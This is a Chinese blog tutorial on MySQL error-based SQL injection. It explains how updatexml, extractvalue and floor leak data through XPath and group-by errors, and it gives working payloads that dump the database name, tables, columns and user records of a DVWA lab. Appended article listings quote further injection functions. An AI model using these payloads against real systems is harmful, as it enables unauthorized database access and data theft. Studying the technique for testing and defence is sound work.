报错注入常用报错函数总结

最新推荐文章于 2024-07-23 21:39:06 发布
最新推荐文章于 2024-07-23 21:39:06 发布
阅读量1.9k 收藏 6
点赞数 1
分类专栏: web安全 文章标签: xml web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43609884/article/details/125257564
版权
本文介绍了SQL注入中两种常用的函数:updatexml和extractvalue,用于通过触发错误来获取数据库信息。updatexml通过更新XML对象内容引发错误,extractvalue则是查询XML对象信息。文中给出了各种利用这些函数进行数据库暴库、暴表、暴字段和暴内容的示例,并阐述了它们的工作原理。这两种方法都是通过XPath语法错误来实现信息泄露的。
摘要由CSDN通过智能技术生成

报错注入

1 updatexml

作用是更新符合xpath的xml对象中的内容为newvalue。

函数中有三个参数,具体作用是:

updatexml(xmlobj,xpath,newvalue)
xmlobj,即xml document 类型为string 格式
xpath,类型为string,xpath语法的字符串
newvalue,更新后的新值 
 

使用updatexml注入常用格式:

 构造payload:  1' union select updatexml(1,concat(0x5e,(select version()),0x5e),1) -- -

由于第二个参数使用了concat函数进行拼接,所以会输出不属于xpath语法的字符串引起数据库报错,从而实现我们的注入,获取数据库相关的信息。

使用案例

暴库:

1' union select updatexml(1,concat(0x5e,(select database()),0x5e),1) -- -

暴表 :

1' union select updatexml(1,concat(0x5e,(select group_concat(table_name) from information_schema.tables where TABLE_SCHEMA='dvwa' ),0x5e),1) -- -

暴字段:

 1' union select updatexml(1,concat(0x5e,(select group_concat(column_name) from information_schema.columns where TABLE_SCHEMA='dvwa' and TABLE_NAME='users' ),0x5e),1) -- -

暴内容 :

1' union select updatexml(1,concat(0x5e,(select group_concat(first_name,0x3e,last_name) from users),0x5e),1) -- -

2  extractvalue

作用是查询符合xpath的xml对象信息

函数中有两个个参数,具体作用是: 

extractvalue(xmlobj,xpath)
xmlobj,即xml document 类型为string 格式
xpath,类型为string,xpath语法的字符串
 

 使用extractvalue注入常用格式:

 extractvalue(null,concat(0x7e,database())

原理与 updatexml类似,都是利用xpath语法错误进行报错提示。

使用案例与其类似。

3 floor

floor报错需要count(),floor(),group by 三者合在一起才能起作用! 使用示例

select count(*),(concat(floor(rand(0)),(select database())))x group by x; 
 

左天才右疯子
关注
专栏目录
《网络安全自学教程》- SQL注入之报错注入原理+步骤+实战操作
wangyuxiang946的博客
03-07 9717
这篇文章为大家解析报错注入的实现原理,结合实战案例讲解报错注入的使用步骤。
SQL注入的报错注入函数
cyjmosthandsome的博客
02-26 6801
一、extractvalue() extractvalue(xml_frag,xpath_expr)函数接受两个参数,第一个为XML标记内容,也就是查询的内容,第二个为XPATH路径,也就是查询的路径。如果没有匹配内容,不管出于何种原因,只要xpath_expr有效,并且xml_frag由正确嵌套和关闭的元素组成 - 返回空字符串。不区分空元素的匹配和无匹配。但是如果X...
MySQL十大报错函数
dingpiqu2796的博客
09-01 599
1.Floor() round() 遵循四舍五入把原值转化为指定小数位数,如:round(1.45,0) = 1;round(1.55,0)=2 floor()向下舍入为指定小数位数 如:floor(1.45,0)= 1;floor(1.55,0) = 1 ceiling()向上舍入为指定小数位数 如:ceiling(1.45,0) = 2;ceiling(1.55,0)=2 flo...
报错注入常用函数
qq_43238111的博客
05-19 4019
常用的三种报错函数 1.原理 在 MYSQL 中使用一些指定的函数来制造报错,后台没有屏蔽数据库报错信息, 在语法发生错误会输出在前端,从而从报错信息中获取设定的信息。 select/insert/update/delete 都可以使用报错来获取信息。 2.步骤 第一步:先判断是否存在漏洞 第二步:构造错误的语法,使用对应的报错函数: updatexml(),extractvalue(),floor() ,exp() 第三步:爆表名 第四步:爆字段 第五步:爆数据名 第六步:报数据值 3.函数
几种常见的报错注入类型详解
最新发布
m0_74312676的博客
07-23 1091
报错注入是一种通过引起数据库报错并从错误信息中提取有用信息的SQL注入攻击手法;攻击者利用数据库在处理异常情况时返回的错误消息,来推断出数据库结构、字段名甚至数据内容;这种攻击方法依赖于数据库将详细的错误消息返回给客户端。若在测试时发现网页会回显sql相关的报错信息,那么此时就可以尝试使用错误注入这种方式进行渗透。可以利用报错注入的前提:就是页面有错误信息显示出来、保证函数能够正确执行。
报错注入七大常用函数
weixin_54217950的博客
02-15 6856
报错注入七大大常用函数 1.ST_LatFromGeoHash()(mysql>=5.7.x) and ST_LatFromGeoHash(concat(0x7e,(),0x7e))--+ 2.ST_LongFromGeoHash(mysql>=5.7.x) 同 8 ,都使用了嵌套查询 and ST_LongFromGeoHash(concat(0x7e,(),0x7e))--+ 3.GTID (MySQL >= 5.6.X - 显错<=200) 0x01 GTID GTID是M
报错注入函数指南
qq_28624871的博客
05-01 2267
1. geometrycollection() mysql版本5.5   (1)函数解释: GeometryCollection是由1个或多个任意类几何对象构成的几何对象。GeometryCollection中的所有元素必须具有相同的空间参考系(即相同的坐标系)。   (2)官方文档中举例的用法如下: GEOMETRYCOLLECTION(POINT(10 10), POINT(30 30), LINESTRING(15 15, 20 20))   (3)报错原因: 因为MYSQL无法使用这样的字符串画
MySQL报错注入函数汇总
Au
06-12 5239
常用函数 字符串连接函数,将多个字符串连接成一个字符串,当中间字符串有一个为空时,最后结果也为空 concat(str1, str2, str3 ,...) concat_ws('指定分隔符', str1,str2,str3...) 开头指定分隔符,与concat()不同,它会自动忽略中间的空值,只有分隔符为空,整体才返回空 group_concat...
MYSQL报错注入
聚鼎安全
01-08 3599
目录审计思路报错语句报错函数查询表floor报错函数讲解报错原理语句xpath语法报错函数讲解语句整数溢出报错exppowcot列名重复报错name_constjoin using几何函数报错不存在函数报错 审计思路 代码中带入查询的参数没有经过任何过滤并产生报错,具有报错信息提示,就可以用报错查询。 常用报错检测符号:’ \ ; %00 ) ( # " 报错函数通常尤其最长报错输出的限制,面对这种情况,可以进行分割输出。 特殊函数的特殊参数进运行一个字段、一行数据的返回,使用group_c
SQL注入 报错(updatexml与extractvalue函数介绍)-01
09-15
今天,我们将讨论SQL注入报错的两种常用函数:updatexml和extractvalue函数。 updatexml函数 updatexml函数是MySQL中的一个XML函数,用于更新XML文档中的数据。其语法为: ``` UPDATEXML(XML_document, XPath_...
SQL注入报错注入函数
热门推荐
lightsec
03-15 1万+
前言 报错注入的前提是当语句发生错误时,错误信息被输出到前端。其漏洞原因是由于开发人员在开发程序时使用了print_r (),mysql_error(),mysqli_connect_error()函数将mysql错误信息输出到前端,因此可以通过闭合原先的语句,去执行后面的语句。 常用报错函数 updatexml() 是mysql对xml文档数据进行查询和修改的xpath函数 extractvalue() 是mysql对xml文档数据进行查询的xpa...
sql注入之报错注入
2301_80913334的博客
04-12 2145
掌握好extractvalue、updatexml、floor报错,floor报错较难需要多理解,updatexml较为常用报错注入是通过特殊函数错误使用并使其输出错误结果来获取信息的。是一种页面响应形式。响应过程:用户在前台页面输入检索内容后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行数据库将执行的结果返回后台,后台将数据库执行的结果无加区别的显示在前台页面报错注入存在基础:后台对于输入输出的合理性没有做检查演示:输入正常语句情况下页面。
基于函数报错的注入·
qq_42764906的博客
03-31 306
首先查看是否有漏洞(注:用英文状态下的’否则出不来 用大写锁定也可以) 输入 得到 我们需要做一些处理 否则只会出现一部分 会被吃掉 加~ ~为 0x7e 分别 得到 得到 输入 得到 用limit 从第一个位置开始取limit 0,1 如果是第二个位置limit1,1 以此类推 输入 得到 输入 输入 得到 输入 得到 输入 得到 汇总 ...
基于函数报错的注入
weixin_43534549的博客
04-01 446
Sql-Inject漏洞手动测试-基于函数报错的信息获取 1.常用报错函数updatexml()、extractvalue()、floor() 2.基于函数报错的信息获取(sellect/insert/update/delete) 基于报错的信息获取: 技巧思路: 一、在MYSQL中使用一些指定的函数来制造报错,从而从报错信息中获取设定的信息。 二、select/insert/update/de...
SQL注入:报错注入
qq_68163788的博客
01-27 2281
QL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入中注入恶意的SQL代码来执行未经授权的数据库操作。报错注入是一种SQL注入的类型,它利用数据库在执行恶意SQL语句时产生的错误消息来获取有关数据库结构和数据的信息。 假设有一个使用用户输入构建SQL查询的应用程序。攻击者可以通过在输入中注入恶意的SQL代码来触发数据库错误,并从错误消息中获取有关数据库的信息,如表名、列名等。这些信息可以帮助攻击者进一步利用数据库。
mysql报错函数_MySQL十大报错函数
weixin_36124750的博客
01-18 877
1.Floor()round() 遵循四舍五入把原值转化为指定小数位数,如:round(1.45,0) = 1;round(1.55,0)=2floor()向下舍入为指定小数位数 如:floor(1.45,0)= 1;floor(1.55,0) = 1ceiling()向上舍入为指定小数位数 如:ceiling(1.45,0) = 2;ceiling(1.55,0)=2floor(x),返回小于或...
基于报错的信息获取 三个常用的用来报错函数
安全界的彭于晏的博客
06-25 383
基于报错的信息获取 技巧思路: 在MYSQL 中使用一些指定的函数来制造报错,从而从报错信息中获取设定的信息. select/insert/update/delete 都可以使用报错来获取信息 背景条件: **前提** 后台没有屏蔽数据库报错信息,在语法发生错误时会输出在前端 基于报错的信息获取 三个常用的用来报错函数 **updatexml()**:函数是MYSQL 对XML 文档数据进行查询和修改的XPATH函数 **extractvalue()**:函数也是MYSQ
sql注入updatexml报错注入
06-08
SQL注入是一种常见的安全漏洞,其中updatexml是一种常用的注入方式之一。如果你在使用updatexml时遇到了报错,可能是由于以下原因: 1. SQL语句中的updatexml函数使用不正确,参数数量或类型不匹配,导致SQL语句...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值